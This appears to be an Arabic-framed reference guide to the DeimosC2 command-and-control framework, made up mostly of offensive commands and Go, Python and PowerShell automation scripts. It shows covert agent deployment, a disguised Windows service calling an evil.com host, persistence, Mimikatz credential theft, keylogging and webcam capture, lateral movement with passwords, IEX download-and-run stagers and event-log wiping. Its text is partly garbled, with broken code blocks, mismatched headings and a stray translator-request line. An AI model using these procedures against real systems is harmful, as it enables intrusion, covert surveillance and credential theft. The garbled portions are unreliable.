دليل إطار DeimosC2 المرجعي
نظرة عامة
DeimosC2 هو إطار للأوامر والتحكم ما بعد الاختراق مبني على Golang، مصمم لعمليات الفريق الأحمر واختبار الاختراق. مبني على مبادئ العمارة الحديثة، يركز DeimosC2 على التوافق بين المنصات، والاتصالات الآمنة، والقدرات الشاملة لما بعد الاختراق مع الحفاظ على بصمة خفيفة وتقنيات تحايل متقدمة.
⚠️ تحذير: هذه الأداة مخصصة لاختبارات الاختراق المصرح بها وتمارين الفريق الأحمر فقط. تأكد من وجود التصريح المناسب قبل استخدامها ضد أي هدف.
التثبيت
المتطلبات الأساسية
# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrcالتثبيت من GitHub
# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server
# Build the agent
go build -o deimosc2-agent ./cmd/agent
# Make executables
chmod +x deimosc2-server deimosc2-agentتثبيت Docker
# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build Docker image
docker build -t deimosc2 .
# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2التجميع عبر المنصات
# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agentالاستخدام الأساي
بدء تشغيل الخادم
# Start DeimosC2 server with default settings
./deimosc2-server
# Start with custom configuration
./deimosc2-server -config config.json
# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
# Start in debug mode
./deimosc2-server -debugملف التكوين
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}الوصول للواجهة الويب
# Access DeimosC2 web interface
http://localhost:8080
# HTTPS access
https://your-domain.com:443
# Default credentials (configurable)
Username: admin
Password: SecurePassword123!نشر الوكيل
تنفيذ الوكيل الأساسي
# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20خيارات تكوين الوكيل
# Command line options
./deimosc2-agent -h
Options:
-server string C2 server URL (required)
-interval int Check-in interval in seconds (default: 30)
-jitter int Jitter percentage (default: 10)
-user-agent string Custom User-Agent string
-proxy string Proxy URL (http://proxy:port)
-cert string Custom CA certificate file
-insecure Skip TLS certificate verification
-debug Enable debug loggingالنشر التخفي
# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080
# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdfتثبيت الخدمة (Windows)
# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"
# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"الأوامر والتحكم
إدارة الوكيل
# List active agents
agents list
# Get agent information
agents info [agent_id]
# Execute command on agent
agents exec [agent_id] "whoami"
# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
# Kill agent
agents kill [agent_id]
# Rename agent
agents rename [agent_id] [new_name]عمليات الملفات
# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
# List directory contents
ls [agent_id] C:\Users\Administrator\Documents
# Change directory
cd [agent_id] C:\Windows\System32
# Create directory
mkdir [agent_id] C:\Windows\Temp\data
# Remove file
rm [agent_id] C:\Windows\Temp\payload.exeإدارة العمليات
# List processes
ps [agent_id]
# Kill process
kill [agent_id] [pid]
# Start process
start [agent_id] notepad.exe
# Process injection
inject [agent_id] [pid] [shellcode_file]
# Memory dump
memdump [agent_id] [pid] output.dmpالعمليات الشبكية
# Network discovery
discover [agent_id] 192.168.1.0/24
# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
# ARP scan
arpscan [agent_id] 192.168.1.0/24
# Network interfaces
ifconfig [agent_id]
# Routing table
route [agent_id]
# Network connections
netstat [agent_id]الميزات المتقدمة
آليات البقاء
# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"رفع الامتيازات
# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
# Token manipulation (Windows)
elevate token [agent_id] [target_pid]
# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
# SUID exploitation (Linux)
elevate suid [agent_id]
# Kernel exploits
elevate kernel [agent_id] [exploit_name]الحركة الجانبية
# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"عمليات بيانات الاعتماد```bash
Dump credentials (Windows)
creds dump [agent_id]
Mimikatz execution (Windows)
creds mimikatz [agent_id] “sekurlsa::logonpasswords”
SAM dump (Windows)
creds sam [agent_id]
LSA secrets (Windows)
creds lsa [agent_id]
Browser credentials
creds browser [agent_id]
SSH keys (Linux/macOS)
creds ssh [agent_id]
Keychain dump (macOS)
creds keychain [agent_id]
**إعداد ما قبل المهمة**: تكوين الخادم وتجميع الوكلاء قبل المهمةbash
SOCKS proxy
pivot socks [agent_id] 1080
Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
HTTP tunnel
pivot http [agent_id] 8080
DNS tunnel
pivot dns [agent_id] tunnel.example.com
**إدارة الوكلاء**: استخدام أسماء وكلاء وصفية وتنظيمهم حسب الشبكةbash
Screenshot
screenshot [agent_id]
Keylogger
keylog start [agent_id] keylog stop [agent_id] keylog dump [agent_id]
Webcam capture
webcam [agent_id]
Microphone recording
microphone [agent_id] 60
Clipboard monitoring
clipboard [agent_id]
File search
search [agent_id] C:\Users *.docx
Registry search
regsearch [agent_id] HKLM password
**بروتوكولات الاتصال**: إنشاء قنوات اتصال C2 آمنةgo
package main
import ( “bytes” “encoding/json” “fmt” “io/ioutil” “net/http” “time” )
type DeimosClient struct \\{ BaseURL string Username string Password string HTTPClient *http.Client Token string \\}
type Agent struct \\{
ID string json:"id"
Hostname string json:"hostname"
Username string json:"username"
OS string json:"os"
IP string json:"ip"
Status string json:"status"
\\}
type Command struct \\{
AgentID string json:"agent_id"
Command string json:"command"
Args string json:"args"
\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\{ return &DeimosClient\\{ BaseURL: baseURL, Username: username, Password: password, HTTPClient: &http.Client\\{Timeout: 30 * time.Second\\}, \\} \\}
func (c *DeimosClient) Authenticate() error \\{ authData := map[string]string\\{ “username”: c.Username, “password”: c.Password, \\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\{ req, _ := http.NewRequest(“GET”, c.BaseURL+“/api/agents”, nil) req.Header.Set(“Authorization”, “Bearer “+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\{ cmdData := Command\\{ AgentID: agentID, Command: command, \\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\{ commands := []string\\{ “whoami”, “hostname”, “pwd”, “ps”, “ifconfig”, “netstat -an”, “uname -a”, \\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\{ persistenceCommands := []string\\{ “persist registry HKCU “Software\Microsoft\Windows\CurrentVersion\Run” “WindowsUpdate” “C:\Windows\Temp\agent.exe"", “persist schtask “SystemUpdate” “C:\Windows\Temp\agent.exe” “ONLOGON"", “persist service “WindowsUpdateService” “C:\Windows\Temp\agent.exe"", \\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}\\}
func main() \\{ client := NewDeimosClient(“http://192.168.1.100:8080”, “admin”, “SecurePassword123!”)
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}\\}
**معالجة البيانات**: تنفيذ جمع وتخزين البيانات بشكل آمنpython
#!/usr/bin/env python3
DeimosC2 Python automation script
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip(’/’) self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)def main(): client = DeimosClient(“http://192.168.1.100:8080”, “admin”, “SecurePassword123!”)
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)if name == “main”: main()
For the other sections, I'll need the specific text to translate. Could you provide the content for those sections?```powershell
# DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\\\{
param(
[string]$ServerURL = "http://192.168.1.100:8080",
[string]$Username = "admin",
[string]$Password = "SecurePassword123!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\\\}
# Execute automation
Invoke-DeimosAutomationIntegration with Other Tools
Metasploit Integration
# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
runEmpire Integration
# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
executeCobalt Strike Integration
# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team serverOperational Security
Communication Security
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.keyTraffic Obfuscation
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30Anti-Forensics
# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"
# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"Troubleshooting
Common Issues
# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues
# Go build issues
go mod tidy
go clean -cache
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodesDebug Mode
# Enable debug logging
./deimosc2-server -debug
# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
# Check network connectivity
telnet 192.168.1.100 8080Best Practices
Operational Planning
- Pre-engagement setup: Configure server and compile agents before engagement
- Agent management: Use descriptive agent names and organize by network
- Communication protocols: Establish secure C2 communication channels
- Data handling: Implement secure data collection and storage
- Cleanup procedures: Plan for artifact removal and agent cleanup
Security Considerations
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channelsDocumentation and Reporting
# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution preventionResources
- DeimosC2 GitHub Repository
- DeimosC2 Documentation
- Go Programming Language
- MITRE ATT&CK Framework
- [SANS Red Team Operations](https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/ يوفر هذا الدليل المرجعي مرجعًا شاملًا لاستخدام إطار عمل DeimosC2. تأكد دائمًا من حصولك على التصريح المناسب قبل إجراء عمليات الفريق الأحمر أو اختبار الاختراق.